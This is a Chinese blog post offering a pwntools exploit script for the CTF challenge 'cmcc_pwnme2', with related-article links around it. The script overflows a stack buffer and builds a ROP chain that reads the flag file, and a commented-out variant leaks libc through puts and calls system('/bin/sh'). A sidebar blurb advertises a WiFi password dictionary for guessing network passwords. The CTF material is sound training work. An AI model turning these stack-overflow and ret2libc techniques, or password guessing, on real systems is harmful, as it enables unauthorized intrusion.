cmcc pwnme2

最新推荐文章于 2024-01-31 14:40:58 发布
最新推荐文章于 2024-01-31 14:40:58 发布
阅读量307 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pondzhang/article/details/111712837
版权 
from pwn import *

#p = process('./pwnme2')

p = remote("node3.buuoj.cn",26522)

libc = ELF('./libc-2.23.so')

elf = ELF("./pwnme2")


plt_puts = 0x08048490
got_puts = 0x0804A028
main = 0x080486F8
plt_gets = 0x08048440
exec_string = 0x080485CB

bss_string = 0x0804A060

payload = 108*'a' + p32(0xdeadbeaf) + p32(plt_gets) +  p32(exec_string)  + p32(bss_string)

p.recvuntil('Please input:\n')
p.sendline(payload)
p.sendline("/flag\x00")
p.recv()


'''
payload = 108*'a' + p32(0xdeadbeaf) + p32(plt_puts) +  p32(main)  + p32(got_puts)

p.recvuntil('Please input:\n')
p.sendline(payload)

real_puts = u32(p.recvuntil('\xf7')[-4:].ljust(4,'\x00'))

log.success(hex(real_puts))

libc_base = real_puts - libc.sym['puts']

log.success(hex(libc_base))

system = libc_base + libc.sym['system']
binsh = libc_base + libc.search('/bin/sh').next()

payload = 108*'a' + p32(0xdeadbeaf) + p32(system) +  p32(main)  + p32(binsh)

p.recvuntil('Please input:\n')
p.sendline(payload)

p.interactive()
'''

 

「已注销」
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwnme2题目
10-14
cmcc搞的ctf的pwnme2题目的文件,感兴趣的同学可以下载来玩玩
BUUCTF之“cmcc_pwnme2”做题简单记录
Probeginner的博客
12-11 2626
这题还好,值得注意的是IDA里头函数栏里面的函数名字需要多注意其意思,说不定就 是提示的信息。 from pwn import * p = remote('node4.buuoj.cn',25488) elf=ELF('./pwnme2') exec_string=0x080485cb string=0x0804a060 gets=elf.sym['gets'] p.recvuntil('Please input:\n') payload=b'a'*(0x6c+4)+p32(gets)+p32(.
cmcc_pwnme2
m0_61948538的博客
02-01 190
栈溢出基础传参题
[BUUCTF]PWN——cmcc_pwnme2
mcmuyanga的博客
01-20 958
cmcc_pwnme2 附件 步骤: 例行检查,32位,开启了nx保护 本地运行一下看看大概的情况 32位ida载入 main(),10行的gets存在溢出 userfunction() main函数里就这么多东西,看看左边的函数列表,发现了挺有意思的几个函数 exec_string() add_home() add_flag() 由于exec_string()函数的存在,所以想到的是利用它来读取出flag,add_home()和add_flag()应该是这题比赛时候的目录,根据之前在buu
[BUUCTF]-PWN:cmcc_pwnme2解析
2301_79326813的博客
01-31 243
保护ida。
pwnme3题目
10-14
cmcc的ctf的pwnme3的题目,欢迎大家一起学习交流做题的思路
cmcc-stp.Msi
11-05
cmcc-stp.Msi
CMCC Portal Wireshark 插件
07-20
中国移动Portal协议分析的Wireshark插件,可分析CMCC Portal协议。使用方法:1)将cmccportal.lua放到wireshark的安装根目录,2)修改wireshark根目录下的init.lua,在文件最后增加dofile(DATA_DIR.."cmccportal.lua...
cmcc-LTE题库
10-19
cmccLTE考试题库,基本涵盖CMCC各类认证考试知识框架,经过整理分类便于学习
libc.so.6_x86
02-24
2016年的Seccon ctf pwn题cheer_msg的libc库文件。
0ctf-2017-pwn-char-libc.so
02-05
2017年0ctf的pwn题char的libc库文件
持续更新 BUUCTF——PWN(二)
weixin_41748164的博客
12-14 386
buuctf pwn 第三页
[ISCC 2023] pwn部分
weixin_52640415的博客
05-26 3570
ISCC 2023 pwn部分
CTF比赛PWN题sgtlibc通用快速解题框架
serfend's blog
07-07 1523
开源地址:https://github.com/serfend/sgtlibc使用 安装pwn解题框架例题:buuctf start system_bss_binsh_direct_x64 shellcode_orw_x86 例题:buuctf pwnable_orw libc-leak_x86_puts 例题:ctfshow ret2libc_64 内部赛_签到题 libc-leak_x86_write_pure 例题:buuctf jarvisoj_level1 libc-leak_x86_writ
Pwn题中修改程序连接库的方法
Nothing
11-28 1730
做Pwn的时候有时候会遇到题目的环境和本地环境不一致的情况。如果要装和远程环境相同的虚拟机就会比较麻烦,下面可以通过修改binary动态连接库的方法,强行让程序链接到与远程环境相同的库上。 1.首先下载好和远程环境相同的动态库,如libc-2.23.so;然后下载与之相符的链接器ld-2.23.so。有两个项目可以实现自动下载 libc:https://github.com/niklasb/lib...
buuctf-pwn write-ups (10)
CoLin的pwn小屋
03-04 575
buuctf wp
[BUUCTF]PWN——cmcc_pwnme1(ret2libc)
mcmuyanga的博客
01-30 667
cmcc_pwnme1 附件 步骤 例行检查,32位程序,没用开启任何保护 本地试运行一下,看看大概的情况 32位ida载入,检索字符串的时候发现了读出flag的函数 这个flag的位置不清楚对不对,按照buu的习性,应该不对 main() getfruit(),这边存在栈溢出 先试一下那个读出flag的函数,和我想的一样,buu上flag的目录不在那儿 因为看到没用开启nx,所以一开始想要使用shellcode,但是碍于没法获得参数v1在栈上的位置,就换用ret2libc的方法了 完整ex
pwnme2和pwnme3的wp
一个码农的笔记
10-15 1401
这两个题目是cmcc的比赛,比较有意思,我把pwn的wp发出来,供大家学习,我会写的稍微详细一点,方便新手学习 pwnme2的下载地址是http://download.csdn.net/download/niexinming/10021147 题目要求:Task: 溢出,操控按顺序执行函数,读取到flag文件即可... 题目地址:nc 104.224.169.128 18887把pwnme2直接
cmcc wifi字典文件
最新发布
02-03
CMCC WiFi字典文件是中国移动通信公司推出的一种用于WiFi连接的辅助工具。该文件包含了大量的WiFi网络名称和密码对的组合,用户可以通过这些密码尝试连接到需要输入密码的WiFi网络,提高连接成功的概率。 这些密码是通过一定的算法和技术生成和整理而成,覆盖了大量常见的密码组合和网络名称,帮助用户更快地连接到WiFi网络。CMCC WiFi字典文件的使用方法简单,用户只需将其导入到相应的连接工具中,然后选择需要连接的WiFi网络,工具会自动使用字典文件中的密码进行尝试。 CMCC WiFi字典文件的优点是能够提高用户连接WiFi网络的成功率,尤其是对于一些密码相对简单的网络,使用字典文件可以更快地找到准确的密码,避免了用户繁琐的手动尝试。然而,需要注意的是,使用字典文件进行连接网络可能存在一定的法律和道德风险,使用者需谨慎使用,遵守相关法律法规。 总的来说,CMCC WiFi字典文件是一种方便的WiFi连接工具,可以帮助用户更快地连接到需要密码的网络,提高连接成功率。用户在使用过程中应当遵守法律规定,谨慎使用,以免造成不必要的麻烦。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值